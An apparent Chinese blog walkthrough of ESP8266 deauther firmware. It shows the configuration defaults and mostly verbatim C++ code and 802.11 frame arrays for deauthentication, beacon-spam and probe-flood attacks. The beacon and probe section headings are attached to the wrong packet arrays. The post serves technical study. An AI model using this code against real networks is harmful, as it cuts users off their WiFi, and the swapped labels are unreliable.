这一系列的文章仅作技术研究,请遵守相关法律(中华人民共和国网络安全法),请勿使用相关技术来攻击他人!
1 软件配置方法
1.1wifi相关配置
这一部分的配置在wifi.h文件中,这里规定了web文件的位置,已经wifi的配置。比如登陆的ip地址,默认是192.168.4.1,默认的子网掩码是255.255.255.0。
-
// Server and other global objects
-
ESP8266WebServer server(80);
-
DNSServer dnsServer;
-
IPAddress apIP(192, 168, 4, 1);
-
IPAddress netMsk(255, 255, 255, 0);
-
File fsUploadFile;
-
-
// current WiFi mode and config
-
uint8_t wifiMode = WIFI_MODE_OFF;
-
-
bool wifi_config_hidden =
false;
-
bool wifi_config_captivePortal =
false;
-
String wifi_config_ssid;
-
String wifi_config_password;
-
String wifi_config_path;
1.2核心配置
这一部分的配置在Setting.h中,比如版本号、攻击超时时间、wifi的channel、SSID、password、是否隐藏SSID、语言等。比如登陆使用的SSID默认为pwned,密码默认为deauther,默认的语言为英语。本来想做一个汉化包进去方便中国爱好者使用,后来发现在V2.1中,已经加入了中文语言包。V2.1web页面支持的语言包括:cn中文、cs捷克语、de德语、en英语、es西班牙语、fi芬兰语、fr法语、it意大利语、ro罗马尼亚语、ru俄语、tlh克林贡语
-
bool changed =
false;
-
-
String version = VERSION;
-
-
bool beaconChannel =
false;
-
bool autosave =
true;
-
bool beaconInterval =
false;
-
bool cli =
true;
-
bool displayInterface = USE_DISPLAY;
-
bool webInterface =
true;
-
bool webSpiffs =
false;
-
bool randomTX =
false;
-
bool ledEnabled =
true;
-
bool serialEcho =
true;
-
-
uint32_t attackTimeout =
600;
-
uint32_t autosaveTime =
10000;
-
uint32_t displayTimeout =
600;
-
uint16_t deauthsPerTarget =
20;
-
uint16_t chTime =
384;
-
uint16_t minDeauths =
3;
-
uint8_t forcePackets =
1;
-
uint8_t channel =
9;
-
uint8_t deauthReason =
1;
-
uint8_t *macSt;
-
uint8_t *macAP;
-
uint8_t probesPerSSID =
1;
-
-
String ssid =
"pwned";
-
String password =
"deauther";
-
bool hidden =
false;
-
bool captivePortal =
true;
-
String lang =
"en";
(3)其他配置
其他的配置设及到一些关键的数据结构,这里没有多做研究。
2 网络攻击核心代码解析
2.1 deauth攻击
(1)deauth攻击数据包deauthPacket[26]的结构
-
uint8_t deauthPacket[
26] = {
-
/* 0 - 1 */
0xC0,
0x00,
// type, subtype c0: deauth (a0: disassociate)
-
/* 2 - 3 */
0x00,
0x00,
// duration (SDK takes care of that)
-
/* 4 - 9 */
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
// reciever (target)
-
/* 10 - 15 */
0xCC,
0xCC,
0xCC,
0xCC,
0xCC,
0xCC,
// source (ap)
-
/* 16 - 21 */
0xCC,
0xCC,
0xCC,
0xCC,
0xCC,
0xCC,
// BSSID (ap)
-
/* 22 - 23 */
0x00,
0x00,
// fragment & squence number
-
/* 24 - 25 */
0x01,
0x00
// reason code (1 = unspecified reason)
-
}
(2)deauth攻击核心代码
-
bool Attack::deauthDevice(
uint8_t* apMac,
uint8_t* stMac,
uint8_t reason,
uint8_t ch) {
-
if (!stMac)
return
false;
// exit when station mac is null
-
-
// Serial.println("Deauthing "+macToStr(apMac)+" -> "+macToStr(stMac)); // for debugging
-
-
bool success =
false;
-
-
// build deauth packet
-
packetSize =
sizeof(deauthPacket);
-
memcpy(&deauthPacket[
4], stMac,
6);
-
memcpy(&deauthPacket[
10], apMac,
6);
-
memcpy(&deauthPacket[
16], apMac,
6);
-
deauthPacket[
24] = reason;
-
-
// send deauth frame
-
deauthPacket[
0] =
0xc0;
-
-
if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
-
success =
true;
-
deauth.packetCounter++;
-
}
-
-
// send disassociate frame
-
deauthPacket[
0] =
0xa0;
-
-
if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
-
success =
true;
-
deauth.packetCounter++;
-
}
-
-
// send another packet, this time from the station to the accesspoint
-
if (!macBroadcast(stMac)) {
// but only if the packet isn't a broadcast
-
// build deauth packet
-
memcpy(&deauthPacket[
4], apMac,
6);
-
memcpy(&deauthPacket[
10], stMac,
6);
-
memcpy(&deauthPacket[
16], stMac,
6);
-
-
// send deauth frame
-
deauthPacket[
0] =
0xc0;
-
-
if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
-
success =
true;
-
deauth.packetCounter++;
-
}
-
-
// send disassociate frame
-
deauthPacket[
0] =
0xa0;
-
-
if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
-
success =
true;
-
deauth.packetCounter++;
-
}
-
}
-
-
if (success) deauth.time = currentTime;
-
-
return success;
-
}
2.2 beacon攻击
(1)beacon攻击数据包beaconPacket[68]的结构
-
uint8_t probePacket[
68] = {
-
/* 0 - 1 */
0x40,
0x00,
// Type: Probe Request
-
/* 2 - 3 */
0x00,
0x00,
// Duration: 0 microseconds
-
/* 4 - 9 */
0xff,
0xff,
0xff,
0xff,
0xff,
0xff,
// Destination: Broadcast
-
/* 10 - 15 */
0xAA,
0xAA,
0xAA,
0xAA,
0xAA,
0xAA,
// Source: random MAC
-
/* 16 - 21 */
0xff,
0xff,
0xff,
0xff,
0xff,
0xff,
// BSS Id: Broadcast
-
/* 22 - 23 */
0x00,
0x00,
// Sequence number (will be replaced by the SDK)
-
/* 24 - 25 */
0x00,
0x20,
// Tag: Set SSID length, Tag length: 32
-
/* 26 - 57 */
0x20,
0x20,
0x20,
0x20,
// SSID
-
0x20,
0x20,
0x20,
0x20,
-
0x20,
0x20,
0x20,
0x20,
-
0x20,
0x20,
0x20,
0x20,
-
0x20,
0x20,
0x20,
0x20,
-
0x20,
0x20,
0x20,
0x20,
-
0x20,
0x20,
0x20,
0x20,
-
0x20,
0x20,
0x20,
0x20,
-
/* 58 - 59 */
0x01,
0x08,
// Tag Number: Supported Rates (1), Tag length: 8
-
/* 60 */
0x82,
// 1(B)
-
/* 61 */
0x84,
// 2(B)
-
/* 62 */
0x8b,
// 5.5(B)
-
/* 63 */
0x96,
// 11(B)
-
/* 64 */
0x24,
// 18
-
/* 65 */
0x30,
// 24
-
/* 66 */
0x48,
// 36
-
/* 67 */
0x6c
// 54
-
}
(2)beacon攻击核心代码
-
bool Attack::sendBeacon(
uint8_t* mac,
const
char* ssid,
uint8_t ch,
bool wpa2) {
-
packetSize =
sizeof(beaconPacket);
-
-
if (wpa2) {
-
beaconPacket[
34] =
0x31;
-
}
else {
-
beaconPacket[
34] =
0x21;
-
packetSize -=
26;
-
}
-
-
int ssidLen =
strlen(ssid);
-
-
if (ssidLen >
32) ssidLen =
32;
-
-
memcpy(&beaconPacket[
10], mac,
6);
-
memcpy(&beaconPacket[
16], mac,
6);
-
memcpy(&beaconPacket[
38], ssid, ssidLen);
-
-
beaconPacket[
82] = ch;
-
-
// =====
-
uint16_t tmpPacketSize = (packetSize -
32) + ssidLen;
// calc size
-
uint8_t* tmpPacket =
new
uint8_t[tmpPacketSize];
// create packet buffer
-
memcpy(&tmpPacket[
0], &beaconPacket[
0],
38 + ssidLen);
// copy first half of packet into buffer
-
tmpPacket[
37] = ssidLen;
// update SSID length byte
-
memcpy(&tmpPacket[
38 + ssidLen], &beaconPacket[
70], wpa2 ?
39 :
13);
// copy second half of packet into buffer
-
-
if (sendPacket(tmpPacket, tmpPacketSize, ch, settings.getForcePackets())) {
-
beacon.time = currentTime;
-
beacon.packetCounter++;
-
delete tmpPacket;
// free memory of allocated buffer
-
return
true;
-
}
else {
-
delete tmpPacket;
// free memory of allocated buffer
-
return
false;
-
}
-
// =====
-
}
2.3 probe攻击
(1)probe攻击数据包probePacket[109]的结构
-
uint8_t beaconPacket[
109] = {
-
/* 0 - 3 */
0x80,
0x00,
0x00,
0x00,
// Type/Subtype: managment beacon frame
-
/* 4 - 9 */
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
0xFF,
// Destination: broadcast
-
/* 10 - 15 */
0x01,
0x02,
0x03,
0x04,
0x05,
0x06,
// Source
-
/* 16 - 21 */
0x01,
0x02,
0x03,
0x04,
0x05,
0x06,
// Source
-
-
// Fixed parameters
-
/* 22 - 23 */
0x00,
0x00,
// Fragment & sequence number (will be done by the SDK)
-
/* 24 - 31 */
0x83,
0x51,
0xf7,
0x8f,
0x0f,
0x00,
0x00,
0x00,
// Timestamp
-
/* 32 - 33 */
0xe8,
0x03,
// Interval: 0x64, 0x00 => every 100ms - 0xe8, 0x03 => every 1s
-
/* 34 - 35 */
0x31,
0x00,
// capabilities Tnformation
-
-
// Tagged parameters
-
-
// SSID parameters
-
/* 36 - 37 */
0x00,
0x20,
// Tag: Set SSID length, Tag length: 32
-
/* 38 - 69 */
0x20,
0x20,
0x20,
0x20,
-
0x20,
0x20,
0x20,
0x20,
-
0x20,
0x20,
0x20,
0x20,
-
0x20,
0x20,
0x20,
0x20,
-
0x20,
0x20,
0x20,
0x20,
-
0x20,
0x20,
0x20,
0x20,
-
0x20,
0x20,
0x20,
0x20,
-
0x20,
0x20,
0x20,
0x20,
// SSID
-
-
// Supported Rates
-
/* 70 - 71 */
0x01,
0x08,
// Tag: Supported Rates, Tag length: 8
-
/* 72 */
0x82,
// 1(B)
-
/* 73 */
0x84,
// 2(B)
-
/* 74 */
0x8b,
// 5.5(B)
-
/* 75 */
0x96,
// 11(B)
-
/* 76 */
0x24,
// 18
-
/* 77 */
0x30,
// 24
-
/* 78 */
0x48,
// 36
-
/* 79 */
0x6c,
// 54
-
-
// Current Channel
-
/* 80 - 81 */
0x03,
0x01,
// Channel set, length
-
/* 82 */
0x01,
// Current Channel
-
-
// RSN information
-
/* 83 - 84 */
0x30,
0x18,
-
/* 85 - 86 */
0x01,
0x00,
-
/* 87 - 90 */
0x00,
0x0f,
0xac,
0x02,
-
/* 91 - 92 */
0x02,
0x00,
-
/* 93 - 100 */
0x00,
0x0f,
0xac,
0x04,
0x00,
0x0f,
0xac,
0x04,
/*Fix: changed 0x02(TKIP) to 0x04(CCMP) is default. WPA2 with TKIP not supported by many devices*/
-
/* 101 - 102 */
0x01,
0x00,
-
/* 103 - 106 */
0x00,
0x0f,
0xac,
0x02,
-
/* 107 - 108 */
0x00,
0x00}
(2)probe攻击核心代码
-
bool Attack::sendProbe(
uint8_t* mac,
const
char* ssid,
uint8_t ch) {
-
packetSize =
sizeof(probePacket);
-
int ssidLen =
strlen(ssid);
-
-
if (ssidLen >
32) ssidLen =
32;
-
-
memcpy(&probePacket[
10], mac,
6);
-
memcpy(&probePacket[
26], ssid, ssidLen);
-
-
if (sendPacket(probePacket, packetSize, ch, settings.getForcePackets())) {
-
probe.time = currentTime;
-
probe.packetCounter++;
-
return
true;
-
}
-
-
return
false;
-
}
1607
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
